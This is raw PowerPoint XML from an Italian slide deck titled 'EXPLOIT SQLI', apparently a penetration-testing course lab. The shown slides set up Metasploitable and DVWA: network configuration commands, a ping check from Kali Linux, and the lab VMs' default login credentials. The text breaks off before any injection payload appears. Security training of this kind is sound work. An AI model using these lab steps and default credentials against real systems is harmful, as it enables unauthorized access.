              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>EXPLOIT SQLI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89711" y="-558105"/>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4260502" y="-693589"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597471" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597471" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 17" id="17"/>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1539740" y="829618"/>
            <a:ext cx="15208520"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1.2 - CONFIGURAZIONE METASPLOITABLE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pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 20" id="20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10206990" y="2198441"/>
            <a:ext cx="2088222" cy="2015134"/>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7198138">
            <a:off x="15538531" y="3140517"/>
            <a:ext cx="1986243" cy="1916725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12449371" y="1810141"/>
            <a:ext cx="3383824" cy="2110589"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2110589" w="3383824">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3383824" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3383824" y="2110589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2110589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15610707" y="786462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24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10247402" y="5358375"/>
            <a:ext cx="7791652" cy="3423937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3423937" w="7791652">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7791651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7791651" y="3423937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3423937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="215797" y="1678505"/>
            <a:ext cx="6710356"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METASPLOITABLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="2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TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="658966" y="2990323"/>
            <a:ext cx="9008090" cy="6477276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Avviare la VM Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo la macchina virtuale Metasploitable e quando richiesto accediamo con nome utente: “msfadmin” e password: “msfadmin”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, quindi premete Invio. Questo comando aprirà il file che contiene la configurazione della rete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, individuiamo la riga che specifica l'attuale indirizzo IP. Modifichiamo questo indirizzo con quello richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche apportate, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, quindi premiamo Invio per confermare e Control+X per chiudere l’editor nano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare l'interfaccia di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per applicare le modifiche senza riavviare l'intera macchina, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>sudo /etc/init.d/networking restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Infine, per assicurarci che l'indirizzo IP sia stato modificato correttamente, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio. Questo comando mostrerà la configurazione attuale della rete, incluso l’indirizzo IP assegnato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>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619186" y="-2005076"/>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5689357" y="57244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1.3 - VERIFICA COMUNICAZIONE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1596343" y="7746350"/>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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-1616537">
            <a:off x="9590273" y="7834032"/>
            <a:ext cx="2884794" cy="814954"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="814954" w="2884794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2884794" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2884794" y="814955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8149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0247212" y="4299573"/>
            <a:ext cx="7858601" cy="2925146"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2925146" w="7858601">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7858601" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7858601" y="2925146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2925146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="377246" y="1820616"/>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Verifica comunicazione Tra Macchine</a:t>
            </a:r>
          </a:p>
        </p:txBody>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TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="827347" y="2932783"/>
            <a:ext cx="8623223" cy="6535857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="498518" indent="-249259" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3232"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Assicurarsi che entrambe le macchine siano avviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo sia la macchina virtuale Kali Linux che quella Metasploitable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="498518" indent="-249259" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3232"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Eseguire il comando ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Apriamo un terminale su Kali Linux e digitate il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ping seguito dall'indirizzo IP della macchina Metasploitable e lo switch -c4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>per specificare il numero di pacchetti da inviare e premete invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3232"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Interpretare i risultati del ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>configurazione è corretta,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2309">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> vedremo una serie di righe che indicano il tempo impiegato per l'invio di ogni pacchetto, il numero di pacchetti inviati, ricevuti e persi. Se vediamo una risposta simile alla figura a destra, con il 100% dei pacchetti inviati e 0 pacchetti persi, significa che le due macchine possono comunicare correttamente tra loro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3232"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="2254251"/>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2.0 - Configurazione </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>DVWA</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848908" y="-1271955"/>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8020792" y="8564711"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597472" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="1730615" y="1033801"/>
            <a:ext cx="7017191" cy="9723929"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="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7" id="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8" id="8"/>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9" id="9"/>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0" id="10"/>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1" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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7" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11275083" y="-1823040"/>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18" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15337061" y="1120555"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="384054"/>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2 - CONFIGURAZIONE DVWA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10393451" y="4030085"/>
            <a:ext cx="7531557" cy="5374277"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5374277" w="7531557">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7531557" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7531557" y="5374276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5374276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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true" rot="0">
            <a:off x="9144000" y="2198441"/>
            <a:ext cx="4082568" cy="2092316"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2092316" w="4082568">
                <a:moveTo>
                  <a:pt x="0" y="2092316"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4082568" y="2092316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4082568" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2092316"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12074844" y="5416676"/>
            <a:ext cx="1684710" cy="958179"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="958179" w="1684710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1684710" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684710" y="958179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9581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265738" y="1601369"/>
            <a:ext cx="7561949"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Livello difficoltà DVWA</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658872" y="3073391"/>
            <a:ext cx="8942777" cy="5343642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="435090" indent="-217545" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2821"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere alla pagina login della DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>:  Apriamo il nostro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e navighiamo alla pagina di login dell'applicazione Damn Vulnerable Web Application (DVWA) all’indirizzo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>http://192.168.13.150/dvwa/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, con le credenziali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>“admin”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
